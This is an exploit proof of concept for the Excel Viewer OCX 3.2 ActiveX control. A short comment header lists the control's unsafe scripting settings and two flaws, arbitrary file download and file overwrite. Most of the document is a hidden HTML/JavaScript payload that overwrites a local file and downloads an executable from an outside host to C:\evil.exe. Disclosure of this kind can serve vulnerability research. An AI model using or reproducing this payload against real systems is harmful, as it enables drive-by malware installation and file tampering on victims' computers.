ExcelOCX 3.2 Insecure Method

`<html>  
<body>  
/*  
--=0-0-000000000--x==-xxxxxxxxx<br/>  
-   
Excel Viewer OCX 3.2 <br/>  
homepage: www.officeocx.com <br/>  
download: www.brothersoft.com/excel-viewer-ocx-51797.html <br/>  
  
- RegKey Safe for Script: True<br/>  
- RegKey Safe for Init: True <br/>  
- Implements IObjectSafety: True <br/>  
- IDisp Safe: Safe for untrusted: caller,data <br/>   
- IPersist Safe: Safe for untrusted: caller,data <br/>   
- IPStorage Safe: Safe for untrusted: caller,data <br>  
- Tested on Avant Browser 11.7.21 ie 6  
<br/>  
Vuln: <br/>  
1) Arbitrary File Download [HttpDownloadFile]<br/>  
2) Arbitrary file owerwrite [Save] <br/>  
<br/>  
--==0-0000000011011110=== <br/>  
  
Propably it worst apps i ever see <br/>  
this is funy that It is meant as Safe for scripting <br/>  
They want sell it l0l <br/>  
  
---000----------++++---------------000 <br/>  
Alfons Luja <br/>  
Pozdrawiam swoich fanóF <br/>  
9002 <br/>  
:P <br/>  
00 -0000000000000000===------------------x <br/>  
*/<br/>  
  
<div style="visibility:hidden;">  
<object classid='clsid:18A295DA-088E-42D1-BE31-5028D7F9B965' id='kupa'></object>  
<script type="text/javascript">  
/*   
I dont know why but this code act correct only first time  
later it just crash ie   
In avant browser always is ok but it is necessary to wait a lot time   
to finsh loading   
- strange :x   
*/   
  
try{  
var obj = document.getElementById('kupa');  
var rem = "http://www.adalex.pl/motyl/motyl-radio.exe";  
var loc = "C:\evil.exe";  
obj.Save("C:\owerwrite.ini");  
obj.HttpDownloadFile(rem,loc);  
}  
catch(err){  
window.alert('Poc failed');  
}  
</script>  
</div>  
</body>  
</html>   
  
  
`